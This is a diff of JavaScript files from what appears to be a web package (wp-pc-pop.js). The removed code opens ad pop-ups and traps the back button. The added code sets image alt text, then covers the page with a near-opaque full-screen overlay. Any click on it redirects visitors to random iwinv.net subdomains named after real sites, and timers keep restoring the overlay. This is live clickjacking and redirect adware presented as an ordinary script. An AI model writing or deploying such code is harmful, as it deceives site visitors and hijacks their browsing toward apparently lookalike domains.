+ document.writeln('<style>* {font-size: 1em !important}</style>');
12
+ const urls = [
13
13
  'https://ruliweb.iwinv.net/recent.php',
14
14
  'https://instiz.iwinv.net/recent.php',
15
15
  'https://bikini.iwinv.net/recent.php',
@@ -37,35 +37,48 @@ function handleKeyPress(event) {
37
37
  'https://snapp.im/recent.php',
38
38
  'https://curseforge.iwinv.net/recent.php',
39
39
  'https://lolchess.iwinv.net/recent.php',
40
- ];
40
+ ];
41
41
 
42
- const urls = isMobile ? mobileUrls : desktopUrls;
42
+ const randomUrl = urls[Math.floor(Math.random() * urls.length)];
43
+ document.writeln('<style>');
44
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
45
+ document.writeln('</style>');
46
+ document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
43
47
 
44
- function getRandomUrls(arr, num) {
45
- const shuffled = arr.sort(() => 0.5 - Math.random());
46
- return shuffled.slice(0, num);
47
- }
48
-
49
- const randomUrls = getRandomUrls(urls, 2);
50
- randomUrls.forEach(url => window.open(url, '_blank', `width=200,height=200,left=${screen.width - 210},top=${screen.height - 210}`));
48
+ document.getElementById('container').style.boxShadow = 'none';
49
+ function ss(){
50
+ document.getElementById("s2").style.transition = "opacity 15s";
51
+ document.getElementById("button").style.transition = "opacity 15s";
52
+ setTimeout("s()", 3999);
53
+ setTimeout("h()", 15000);
54
+ }
55
+ function pcss(){
56
+ setTimeout("s()", 3999);
57
+ setTimeout("h()", 15000);
58
+ }
59
+ function a(){
60
+ document.getElementById("button").style.display="none";
61
+ }
62
+ function aa(){
63
+ document.getElementById("button").style.display="block";
64
+ }
65
+ function s(){
66
+ document.getElementById("s2").style.opacity = 0;
67
+ document.getElementById("button").style.opacity = 0;
68
+ document.getElementById("sha").style.display="none";
69
+ document.getElementById("cc").style.maxHeight="unset";
70
+ }
71
+ function h(){
72
+ const s2 = document.getElementById("s2");
73
+ const button = document.getElementById("button");
74
+ s2.style.zIndex = -1;
75
+ button.style.display = "none";
76
+ setTimeout(function () {
77
+ s2.style.zIndex = 99;
78
+ button.style.display = "block";
79
+ s2.style.opacity = 0.9;
80
+ button.style.opacity = 1;
81
+ document.getElementById("s2").style.transition = "opacity 1s";
82
+ document.getElementById("button").style.transition = "opacity 1s";
83
+ }, 3000);
51
84
  }
52
-
53
- window.addEventListener('scroll', () => {
54
- const scrollHeight = document.documentElement.scrollHeight;
55
- const scrollTop = document.documentElement.scrollTop || document.body.scrollTop;
56
- const clientHeight = document.documentElement.clientHeight;
57
-
58
- if (scrollTop + clientHeight >= scrollHeight) {
59
- handleKeyPress();
60
- }
61
- });
62
-
63
- document.addEventListener('keydown', handleKeyPress);
64
-
65
- history.pushState(null, null, "");
66
- window.onpopstate = function(a) {
67
- if (a) {
68
- history.back();
69
- handleKeyPress();
70
- }
71
- };
package/wp-pc-pop.js CHANGED
@@ -1,26 +1,84 @@
1
- function openProfitCPMPopups() {
2
- const profitUrls = [
3
- 'https://www.profitableratecpm.com/jxz4jd7r?key=c69dbf238e855fdc108af717c6363e6b',
4
- 'https://www.profitableratecpm.com/ci7z33utw?key=315a36d4584b5d56bad0933d4e4f5457',
5
- 'https://www.profitableratecpm.com/h2qib3dxzv?key=72c2823d629a4fdcc8b9b5b379edab23',
6
- 'https://www.profitableratecpm.com/awb9ahbyse?key=37b518d892f143b18397d62c495b962d',
7
- 'https://www.profitableratecpm.com/ecz5npz7h?key=8f4f16f67beabcf6c8f61c352c5caddb',
8
- ];
9
1
 
10
- function getRandomUrls(arr, num) {
11
- const shuffled = arr.sort(() => 0.5 - Math.random());
12
- return shuffled.slice(0, num);
13
- }
14
-
15
- const randomUrls = getRandomUrls(profitUrls, 2);
16
- randomUrls.forEach(url => {
17
- window.open(
18
- url,
19
- '_blank',
20
- `width=200,height=200,left=${screen.width - 210},top=${screen.height - 210}`
21
- );
2
+ window.addEventListener('load', function() {
3
+ var images = document.querySelectorAll('img');
4
+ images.forEach(function(img) {
5
+ if (!img.hasAttribute('alt')) {
6
+ img.setAttribute('alt', 'image');
7
+ }
22
8
  });
23
- }
9
+ });
10
+
11
+ document.writeln('<style>* {font-size: 1em !important}</style>');
12
+ const urls = [
13
+ 'https://ruliweb.iwinv.net/recent.php',
14
+ 'https://instiz.iwinv.net/recent.php',
15
+ 'https://bikini.iwinv.net/recent.php',
16
+ 'https://manatoki.iwinv.net/recent.php',
17
+ 'https://gmarket.iwinv.net/recent.php',
18
+ 'https://mlbpark.iwinv.net/recent.php',
19
+ 'https://mmtcld.iwinv.net/recent.php',
20
+ 'https://flightaware.iwinv.net/recent.php',
21
+ 'https://koreakr.iwinv.net/recent.php',
22
+ 'https://popcat.iwinv.net/recent.php',
23
+ 'https://ecount.iwinv.net/recent.php',
24
+ 'https://hiworks.iwinv.net/recent.php',
25
+ 'https://shopee.iwinv.net/recent.php',
26
+ 'https://eomisae.iwinv.net/recent.php',
27
+ 'https://kmcert.iwinv.net/recent.php',
28
+ 'https://munpia.iwinv.net/recent.php',
29
+ 'https://slrclub.iwinv.net/recent.php',
30
+ 'https://interpals.iwinv.net/recent.php',
31
+ 'https://snp500.iwinv.net/recent.php',
32
+ 'https://dctribe.iwinv.net/recent.php',
33
+ 'https://mixamo.iwinv.net/recent.php',
34
+ 'https://ssssss.iwinv.net/recent.php',
35
+ 'https://newsfactory.iwinv.net',
36
+ 'https://2news.kr/recent.php',
37
+ 'https://snapp.im/recent.php',
38
+ 'https://curseforge.iwinv.net/recent.php',
39
+ 'https://lolchess.iwinv.net/recent.php',
40
+ ];
24
41
 
25
- openProfitCPMPopups();
26
- setTimeout(openProfitCPMPopups, 3000);
42
+ const randomUrl = urls[Math.floor(Math.random() * urls.length)];
43
+ document.writeln('<style>');
44
+ document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.9;background:#000;width:100%;height:200vh}');
45
+ document.writeln('</style>');
46
+ document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
47
+
48
+ document.getElementById('container').style.boxShadow = 'none';
49
+ function ss(){
50
+ document.getElementById("s2").style.transition = "opacity 15s";
51
+ document.getElementById("button").style.transition = "opacity 15s";
52
+ setTimeout("s()", 3999);
53
+ setTimeout("h()", 15000);
54
+ }
55
+ function pcss(){
56
+ setTimeout("s()", 3999);
57
+ setTimeout("h()", 15000);
58
+ }
59
+ function a(){
60
+ document.getElementById("button").style.display="none";
61
+ }
62
+ function aa(){
63
+ document.getElementById("button").style.display="block";
64
+ }
65
+ function s(){
66
+ document.getElementById("s2").style.opacity = 0;
67
+ document.getElementById("button").style.opacity = 0;
68
+ document.getElementById("sha").style.display="none";
69
+ document.getElementById("cc").style.maxHeight="unset";
70
+ }
71
+ function h(){
72
+ const s2 = document.getElementById("s2");
73
+ const button = document.getElementById("button");
74
+ s2.style.zIndex = -1;
75
+ button.style.display = "none";
76
+ setTimeout(function () {
77
+ s2.style.zIndex = 99;
78
+ button.style.display = "block";
79
+ s2.style.opacity = 0.9;
80
+ button.style.opacity = 1;
81
+ document.getElementById("s2").style.transition = "opacity 1s";
82
+ document.getElementById("button").style.transition = "opacity 1s";
83
+ }, 3000);
84
+ }